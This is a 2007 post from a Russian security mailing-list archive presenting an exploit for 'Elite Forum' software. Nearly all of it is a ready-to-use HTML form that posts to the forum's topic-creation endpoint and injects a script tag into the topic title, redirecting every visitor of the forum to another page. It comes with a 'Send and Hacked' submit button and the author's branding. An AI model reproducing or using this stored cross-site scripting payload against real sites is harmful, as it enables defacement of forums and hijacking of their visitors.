Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [MajorSecurity Advisory #51]Virtual Hosting Control System - Session fixation Issue

  [Aria-Security] Munch Pro Remote Login ByPass

  [Aria-Security] Property Pro Remote Login ByPass

  JBlog 1.0 Creat Admin exploit, xss, Cookie Manipulation

From:starext_(at)_msn.com <starext_(at)_msn.com>
Date:22 июля 2007 г.
Subject:Elite Forum Full HTML ENject versin 1.0.0.0

c0ded: [email protected]
From : Turkey
exploit:

<title>Elite Forum FULL HTML ENjocter-By [email protected]</title>
<style>
body{background:url("fixed">http://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7uf0.jpg);

color:#FFFFFF;
font-weight:bold;}
input{
background-color:darkred;
color:#FFFFFF;
font-weight:bold;
}
</style
<form method=POST action="http://site/path/index.php?act=ptopic&fid=1" target=_blank>
<b><em><h2><b>Elite Forum FULL HTML ENjocter-By [email protected]</b></h2></em></b></font>
       <br>
       
       <b>Your HTML C0de : <br></b>
       <input  size="60" type="text"  name="title" value='<script>location="http://yourindex.html"</script>
'>

       <BR><BR><BR><b>Forum Messages:</b><BR>

       <input cols=2 rows=1 name='post'value='Bug On!!!'><BR><BR><br>
<input type=submit value="Send and Hacked">
       <BR><BR>

       
       <BR><BR><BR>
       </form>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород